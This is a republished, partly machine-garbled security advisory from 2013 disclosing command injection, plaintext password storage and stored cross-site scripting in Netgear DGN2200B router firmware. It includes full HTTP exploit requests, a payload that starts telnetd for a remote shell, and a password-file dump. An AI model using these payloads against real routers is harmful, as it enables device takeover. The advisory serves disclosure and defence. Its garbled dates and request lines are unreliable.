Multiple Netgear DGN2200B Vulnerabilities

Release date:
Updated on: 2013-02-20

Affected Systems:
Netgear DGN2200B Wireless Router V1.0.0.36 _ 7.0.36
Description:
--------------------------------------------------------------------------------
Bugtraq id: 57998
 
NetGear DGN2200B is a wireless ADSL2 + router.
 
Netgear DGN2200B 1.0.0.36 _ 7.0.36 has multiple security vulnerabilities. Attackers can exploit these vulnerabilities to obtain sensitive information, execute arbitrary commands, execute HTML and script code, and steal cookies.
 
1. Because the input is not properly verified, attackers can inject and execute arbitrary commands in the system using the pppoe_username parameter.
2. Save the password in plaintext.
3. A storage-type cross-site scripting vulnerability exists due to incorrect verification of multiple parameters. Attackers can exploit this vulnerability to inject malicious scripts.
 
<* Source: Michael Messner (michae.messner@integralis.com)

Link: http://xforce.iss.net/xforce/xfdb/82126
Http://xforce.iss.net/xforce/xfdb/82127
Http://xforce.iss.net/xforce/xfdb/82128
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!
Michael Messner provides the following information:

============= Vulnerable Firmware Releases: ==================

Hardwareversion DGN2200B
Firmwareversion V1.0.0.36 _ 7.0.36-04/01/2011
GUI Sprachversion: V1.0.0.25

============= Device Description: ====================

Infos: http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx
Http://www.netgear.de/products/home/wireless_routers/work-and-play/DGN2200B.aspx #

Firmware download: http://kb.netgear.com/app/answers/detail/a_id/18990 /~ /Dgn2200% 2Fdgn2200b-firmware-version-1.0.0.36

============== Shodan Torks ====================

Shodan Search: NETGEAR DGN2200

=========== Vulnerability Overview: ======================

* OS Command Injection in the PPOE configuration:

The vulnerability is caused by missing input validation in the pppoe_username parameter and can be exploited to inject and execute arbitrary shell commands. It is possible to upload and execute a backdoor to compromise the device.

Param: pppoe_username

Example Request:
POST or pppoe. cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.0.1/BAS_pppoe.htm
Cookie: uid = vjkqK779eJ
Authorization: Basic YWRtaW46cGFzc3dvcmQ =
Content-Type: application/x-www-form-urlencoded
Content-Length: 593
Connection: close

Login_type = PPPoE % 28PPP + over + Ethernet % 29 & pppoe_username = % 26% 20 ping % 20-c % 201% 20192% 2e168% 2e0% 2e2% 20% 26 & Signature = 69cw20hb & pppoe_servicename = & pppoe_dod = 1 & pppoe_idletime = 5 & WANAssign = Dynamic & DNSAssign = 0 & en_nat = 1 & MACAssign = 0 & apply = % C3 % 9 Cbernehmen & runtest = yes & wan_ipaddr = 0.0.0.0 = 0.0.0.0 & wan_dns_sel = 0 & wan_dns1_pri = 0.0.0.0 & wan_dns1_sec =... & found = 0 & found = 84% 3A1B % 3A5E % 3A01% 3AE7% 3A05 & found = 84% 3A1B % 3A5E % 3A01% 3AE7% 3A05 & found = 5C % 3A26% 3A0A % 3A2B % 3AF0% 3A3F & wan_nat = 1 & opendns_parental_ctrl = 0 & pppoe_flet_sel = & pppoe_flet_type = & pppoe_temp = & opendns_parental_ctrl = 0

=> Wait around 30 seconds till the configuration is saved and activated

Start telnetd on port 1337:
% 26% 20 telnetd-p 1337% 20% 26

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-OS-Command-Injection-Telnetd-started.png

* Insecure Cryptographic Storage:

There is no password hashing implemented and so it is saved in plain text on the system:

~ # Cat/etc/passwd
Nobody: *: 0: 0: nobody:/bin/sh
Admin: password: 0: 0: admin: // bin/sh
Guest: 0: 0: guest:/bin/sh
~ #

* Stored XSS

Injecting scripts into the parameter DomainName mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

-> Zugriffsbeschr & #228; nkungen-> Dienste-> neuen Dienst anlegen-> Dienstname

Param: userdefined

Original request:
POST/fw_serv_add.cgi HTTP/1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.0.1/fw_serv.cgi
Cookie: uid = vjkqK779eJ
Authorization: Basic xxxx =
Content-Type: application/x-www-form-urlencoded
Content-Length: 114

Userdefined = "> & protocol = TCP & portstart = 1 & portend = 5 & apply = % C3 % 9 Cbernehmen & which_mode = 0

You cocould also change the request method to http get:
Http: // 192.168.0.1/fw_serv_add.cgi? Userdefined = "> & protocol = TCP & portstart = 1 & portend = 5 & apply = % C3 % 9 Cbernehmen & which_mode = 0

The scriptcode gets executed if you try to edit this service again.

Screenshot: http://www.s3cur1ty.de/sites/www.s3cur1ty.de/files/images/DGN2200B-Stored-XSS-Dienste.png

* Stored XSS:

Injecting scripts into the parameter ssid mode reveals that this parameter is not properly validated for malicious input. You need to be authenticated or you have to find other methods for inserting the malicious JavaScript code.

-> Wireless-Konfiguration-> Netzwerkname (SSID)

Param: ssid

POST/wlg_sec_profile_main.cgi http/ 1.1
Host: 192.168.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv: 16.0) Gecko/20100101 Firefox/16.0
Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8
Accept-Language: de-de, de; q = 0.8, en-us; q = 0.5, en; q = 0.3
Accept-Encoding: gzip, deflate
Proxy-Connection: keep-alive
Referer: http: // 192.168.0.1/WLG_wireless2_2.htm
Cookie: uid = vjkqK779eJ
Authorization: Basic xxxx =
Content-Type: application/x-www-form-urlencoded
Content-Length: 328

SsidSelect = 1 & ssid = % 2522% 253E % 253 Cscript % 253 Ealert % 25281% 2529% 253 & WRegion = 5 & w_channel = 0 & opmode = 20n & enable_ap = 1 & enable_ssid_bc = 1 & security_type = AUTO-PSK & passphrase = pushed & Apply = % C3 % 9 Cbernehmen & tempSetting = 0 & tempRegion = 5 & initChannel = 0 & h_opmode = 20n & wds_enable = 0 & ver_type = WW & pfChanged = 0 & ssid_sel_submit = 0 & secure_sel_submit = 0

=============== Solution ==================

No known solution available.

============= Credits =================

The vulnerability was discovered by Michael Messner
Mail: devnull # at # s3cur1ty # dot # de
Http://www.s3cur1ty.de/m1adv2013-015
Twitter: @ s3cur1ty_de

============= Time Line: ======================

17.12.2012-discovered vulnerability
18.12.2012-Privately reported all details to vendor
18.12.2012-vendor responded that they will check the reported vulnerability details
292.161.2013-vendor contacted me to test a new firmware
29100001.2013-/me responded that I need more details about the fixes before I will test the new firmware
302.161.2013-vendor reponded that I shoshould just check it
31.01.2013-/me responded that I will not check the firmware if they do not provide more details (do not waste my time again !)
11.02.2013-vendor responded that he has to declare it internally
15.02.2013-public release

================================= Advisory end ======================== ====

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:
 
Netgear
-------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:
 
Http://www.netgear.com/home/products/wirelessrouters/work-and-play/dgn2200.aspx